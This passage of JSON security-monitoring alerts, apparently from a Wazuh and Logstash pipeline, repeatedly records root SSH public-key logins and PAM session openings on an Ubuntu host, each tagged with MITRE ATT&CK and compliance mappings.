success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"sshd","name":"sshd"},"id":"1708024054.185097","data":{"dstuser":"root","srcip":"192.168.83.175","srcport":"46980"}},"@timestamp":"2024-02-15T19:08:00.335172897Z"} -{"@version":"1","_source":{"rule":{"firedtimes":3,"level":3,"description":"PAM: Login session opened.","hipaa":["164.312.b"],"mitre":{"id":["T1078"],"technique":["Valid Accounts"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"pci_dss":["10.2.5"],"gpg13":["7.8","7.9"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["pam","syslog","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5501","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","manager":{"name":"ubuntu2204"},"predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:07:34","hostname":"ubuntu2204"},"decoder":{"parent":"pam","name":"pam"},"id":"1708024054.184661","data":{"uid":"0","dstuser":"root(uid=0)"}},"@timestamp":"2024-02-15T19:08:00.335562330Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"pam","name":"pam"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)","data":{"dstuser":"root(uid=0)","uid":"0"},"id":"1708024665.185992","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts"],"id":["T1078"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access"]},"gpg13":["7.8","7.9"],"firedtimes":4,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"PAM: Login session opened.","id":"5501","hipaa":["164.312.b"],"level":3,"groups":["pam","syslog","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.317790227Z"} -{"@version":"1","_source":{"location":"/var/log/auth.log","predecoder":{"program_name":"sshd","timestamp":"Feb 15 16:17:45","hostname":"ubuntu2204"},"input":{"type":"log"},"decoder":{"parent":"sshd","name":"sshd"},"manager":{"name":"ubuntu2204"},"full_log":"Feb 15 16:17:45 ubuntu2204 sshd[127777]: Accepted publickey for root from 192.168.83.175 port 55888 ssh2: RSA SHA256:sgpOmu5OJ4avTU2/mVUft3/fYEZgrvA+b0E0nb2ScwQ","data":{"srcip":"192.168.83.175","dstuser":"root","srcport":"55888"},"id":"1708024665.186428","agent":{"id":"000","name":"ubuntu2204"},"timestamp":"2024-02-15T16:17:45.245-0300","rule":{"nist_800_53":["AU.14","AC.7"],"mail":false,"pci_dss":["10.2.5"],"gdpr":["IV_32.2"],"mitre":{"technique":["Valid Accounts","Remote Services"],"id":["T1078","T1021"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"gpg13":["7.1","7.2"],"firedtimes":3,"tsc":["CC6.8","CC7.2","CC7.3"],"description":"sshd: authentication success.","id":"5715","hipaa":["164.312.b"],"level":3,"groups":["syslog","sshd","authentication_success"]},"@timestamp":"2024-02-15T19:17:45.245Z"},"@timestamp":"2024-02-15T19:18:00.325355084Z"} -{"@version":"1","_source":{"rule":{"firedtimes":2,"level":3,"description":"sshd: authentication success.","hipaa":["164.312.b"],"mitre":{"id":["T1078","T1021"],"technique":["Valid Accounts","Remote Services"],"tactic":["Defense Evasion","Persistence","Privilege Escalation","Initial Access","Lateral Movement"]},"pci_dss":["10.2.5"],"gpg13":["7.1","7.2"],"tsc":["CC6.8","CC7.2","CC7.3"],"groups":["syslog","sshd","authentication_success"],"nist_800_53":["AU.14","AC.7"],"id":"5715","mail":false,"gdpr":["IV_32.2"]},"location":"/var/log/auth.log","timestamp":"2024-02-15T16:07:34.606-0300","@timestamp":"2024-02-15T19:07:34.606Z","agent":{"id":"000","name":"ubuntu2204"},"input":{"type":"log"},"full_log":"Feb 15 16:07:34 ubuntu2204 sshd[127530]: Accepted publickey for root from 192.168.83.175 port 46980 ssh2: RSA 